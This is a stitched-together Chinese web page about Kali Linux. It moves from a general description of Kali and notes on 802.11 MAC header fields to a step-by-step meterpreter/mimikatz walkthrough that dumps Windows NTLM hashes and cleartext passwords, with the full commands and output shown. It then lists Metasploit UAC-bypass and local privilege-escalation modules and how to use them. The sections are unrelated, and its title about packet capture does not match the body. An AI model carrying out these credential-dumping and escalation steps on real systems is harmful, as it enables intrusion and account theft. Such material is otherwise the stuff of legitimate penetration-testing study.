Linuxkali怎么开启监听和抓包

Linuxkali怎么开启监听和抓包,第1张

关于在 Linux 系统下面如何捕获各种信息包的问题,可以使用专门的应用软件,既可以对经过指定的 IP 地址进行监听和捕获各种信息包、也可以对同一个网段上的所有设备进行捕获各种信息包。

1、手机安装kali可以进行主机渗透,还可以进行密码破解。

2、kali是一个基于Debian的Linux发行版。它的目标就是为了简单。在一个实用的工具包里尽可能多的包含渗透和审计工具。kali并不要求你自己去维护一个Linux系统,或者你自己去收集软件和依赖项。它是一个“交钥匙工程”。所有这些繁杂的工作都不需要用户去考虑,因此,用户只需要专注于要审计的真实工作上,而不需要去考虑准备测试系统。

3、kali是一个安全工具。kali像NMap和Wireskark这样的经典信息采集工具。kali还有面向wifi的工具,也有破解密码的工具。kali并不是为普通用户准备的,而是一个“黑客 *** 作系统“。kali被设计为以root权限运行。它自身并不安全,并且它的配置也与普通的Linux发行版不一样。它是一个攻击型工具,而不是一个防御型工具。

4、kaliLinux是许多优秀的安全工具的集合。kali对于一个专业用户来说,它是一个极好的工具。它有一些优秀的开发工具,用于去实时审计它们的应用程序。如果使用kaliLinux,用户将运行一个缺乏安全保障的系统。

DU (Data Unit)即数据单元,信息传输的最小数据集合。

七层网络协议中,是从高层协议来的信息单元传送到低层协议过程中,上一层会添加本层包头,进行差错校验、完整性检查后进行封装;下一层对传来的信息进行解包。

SDU (service Data Unit):服务数据单元,又叫业务数据单元。

PDU (Ptotocol data unit): 协议数据单元。

简单的理解:

本层的PDU为下层的SDU

本层的SDU为上层的PDU

IEEE 802标准所描述的局域网参考模型只对应OSI参考模型数据链路层与物理层,它将数据链路层划分为 逻辑链路层LLC子层 介质访问控制MAC子层

在数据链路层中信号由LLC子层传向MAC子层:

MSDU --> MIC --> 分帧 --> 添加IV -->加密 --> 添加MAC头部 --> MPDU

在无线网络安全中,数据链路层中的MAC子层对LLC子层传输来的 MSDU (MAC Service Data Unit,MAC服务数据单元)进行添加完整性校验MIC、分帧、添加IV(起始向量)、加密、添加MAC头部后,成为MPDU(MAC Protocol Data Unit,MAC协议数据单元。(蓝色图示)。MAC子层MPDU也就是物理层的PPSU,物理层在对PSDU添加物理层的头部,形成PPDU(物理层协议数据单元)。

我们主要研究的是80211 MAC子层的头部,也就是 Frame Control Field、SeqNr、Address Field。下面我们就看下MAC头部信息。

Header(MAC头)

Frame Control(帧控制域)

Duration/ID(持续时间/标识)

Address(地址域)

Sequence Control(序列控制域)

Frame Control(帧控制域)

Protocol Version(协议版本)

To DS:表明该帧是BSS向DS发送的帧;

From DS:表明该帧是DS向BSS发送的帧;

More Frag:用于说明长帧被分段的情况,是否还有其它的帧;

Retry(重传域):用于帧的重传,接收STA利用该域消除重传帧;

Pwr Mgt(能量管理域):1:STA处于power_save模式;0:处于active模式;

More Data(更多数据域):1:至少还有一个数据帧要发送给STA ;

Protected Frame: 1:帧体部分包含被密钥套处理过的数据;否则:0;

Order(序号域):1:长帧分段传送采用严格编号方式;否则:0。

Duration/ID(持续时间/标识)

表明该帧和它的确认帧将会占用信道多长时间;对于帧控制域子类型为:Power Save-Poll的帧,该域表示了STA的连接身份(AID, Association Indentification)。

Address(地址域)

Address(地址域):源地址(SA)、目的地址(DA)、传输工作站地址(TA)、接收工作站地址(RA),SA与DA必不可少,后两个只对跨BSS的通信有用,而目的地址可以为单播地址(Unicast address)、多播地址(Multicast address)、广播地址(Broadcast address)。

Sequence Control(序列控制域)

Sequence Control(序列控制域):由代表MSDU(MAC Server Data Unit)或者MMSDU(MAC Management Server Data Unit)的12位序列号(Sequence Number)和表示MSDU和MMSDU的每一个片段的编号的4位片段号组成(Fragment Number)。

MAC头部信息我们主要研究Frame Control(帧控制域),后面文章我们将详细进行介绍。

[kali]这方面不说了, meterpreter也略过, 做个关于mimikatz的笔记

mimikatz模块, 能获取对方机器的密码(包括[哈希]和明文)

渗透模块怎么进的也不说了, 方式太多, 我用的是ms17-010

进去meterpreter后getuid一下(其他这个也没多大用处,军哥说进入meterpreter模式下 大部分情况下是拥有 system权限,无需 get system,但可能有些 权限管理严的 不一样)

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

这获得系统管理员权限

加载mimikatz模块

meterpreter > load mimikatz

Loading extension mimikatzSuccess

加载成功

获取登录密码的hash值

meterpreter > msv

[+] Running as SYSTEM

[] Retrieving msv credentials

msv credentials

===============

AuthID Package Domain User Password

0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }

0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }

0;997 Negotiate NT AUTHORITY LOCAL SERVICE ns (Credentials KO)

0;996 Negotiate WORKGROUP CHENGLEE-PC ns (Credentials KO)

上面已经是得到hash值了 下面算明文密码

获取明文密码

meterpreter > kerberos

[+] Running as SYSTEM

[] Retrieving kerberos credentials

kerberos credentials

====================

AuthID Package Domain User Password

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;996 Negotiate WORKGROUP CHENGLEE-PC

0;334101 NTLM chenglee-PC chenglee lizhenghua

0;334068 NTLM chenglee-PC chenglee lizhenghua

look拿到登录的明文密码了

不过也有一些特殊的情况, 例如这样

meterpreter > kerberos

[+] Running as SYSTEM

[] Retrieving kerberos credentials

kerberos credentials

====================

AuthID Package Domain User Password

0;10408969 NTLM CLOUDVM Administrator

0;266228 NTLM CLOUDVM Administrator

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;996 Negotiate WORKGROUP CLOUDVM

噢, 这是什么鬼儿哈希值也获取不到,

没事, 下一步继续,

使用另一种方式获取哈希值

meterpreter > mimikatz_command -f samdump::hashes

Ordinateur : chenglee-PC

BootKey : 0648ced51b6060bed1a3654e0ee0fd93

Rid : 500

User : Administrator

LM :

NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid : 501

User : Guest

LM :

NTLM :

Rid : 1000

User : chenglee

LM :

NTLM : 8d0f8e1a18236379538411a9056799f5

ok, 获取到了,

根据上面的方式获取明文密码

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

[0] { chenglee ; chenglee-PC ; lizhenghua }

[1] { chenglee ; chenglee-PC ; lizhenghua }

[2] { chenglee ; chenglee-PC ; lizhenghua }

[3] { chenglee ; chenglee-PC ; lizhenghua }

[4] { chenglee-PC ; chenglee ; lizhenghua }

[5] { chenglee-PC ; chenglee ; lizhenghua }

meterpreter >

2

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

[0] { Administrator ; CLOUDVM ; 1244567 }

[1] { Administrator ; CLOUDVM ; 1244567 }

都拿到了

另外提一下更简洁的方式,就是 wdigest命令了,

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest

meterpreter > wdigest

[+] Running as SYSTEM

[] Retrieving wdigest credentials

wdigest credentials

===================

AuthID Package Domain User Password

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;996 Negotiate WORKGROUP CHENGLEE-PC

0;334101 NTLM chenglee-PC chenglee lizhenghua

0;334068 NTLM chenglee-PC chenglee lizhenghua

还有一个跟wdigest一样牛的就是tspkg啦

meterpreter > tspkg

[+] Running as SYSTEM

[] Retrieving tspkg credentials

tspkg credentials

=================

AuthID Package Domain User Password

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;996 Negotiate WORKGROUP CHENGLEE-PC

0;334101 NTLM chenglee-PC chenglee lizhenghua

0;334068 NTLM chenglee-PC chenglee lizhenghua

简直就是一击毙命有木有

在上篇文章中,通过win7运行msfexe,kali接收到一个session,但这个session权限只是普通权限,无法做更多的 *** 作。

权限提升

1提高程序运行级别

2UAC绕过

3利用提权漏洞进行提权

提高程序运行级别

msf模块>exploit/windows/local/ask

但会触发UAC,只有当用户同意是才能获得更高权限

可以看到session 5只是普通权限,这时候利用ask模块进行提权,该模块需要设置要用来提权的session,以及启动程序的名称

ask模块设置完成后,就可以使用了,运行exploit,回到win7,可以看见d出一个execlexe程序框,如果你点击是,则kali会获得一个新的session,如果点击否,则kali会得到失败信息。

Win7 截图:

win7 点击 否,kali返回信息:

win7 点击 是,kali获取到新的session

使用background退出这个meterpreter

使用sessions,查看session

使用sessions -i 6,进入新获取的session

使用getuid查看该session权限

发现还是普通权限

这时候使用getsystem,获得系统权限

再使用getuid查看

UAC绕过

msf模块

exploit/windows/local/bypassuac

exploit/windows/local/bypassuac_injection

exploit/windows/local/bypassuac_vbs

这里使用第一个模块进行绕过UAC提权

利用提权漏洞进行提权

exploit/windows/local/ms14_058_track_popup_menu

等等

这里使用

exploit/windows/local/ms16_014_wmi_recv_notif

这个模块,同样使用info和show options查看信息,只需要设置一个session就可以使用

攻击成功会直接返回一个shell,使用whoami查看权限

成功提权

以上就是关于Linuxkali怎么开启监听和抓包全部的内容,包括:Linuxkali怎么开启监听和抓包、请问手机安装kali可以干什么、『Kali 无线渗透07』- 802.11 MAC头部信息等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/web/9759093.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-01
下一篇 2023-05-01

发表评论

登录后才能评论

评论列表(0条)

保存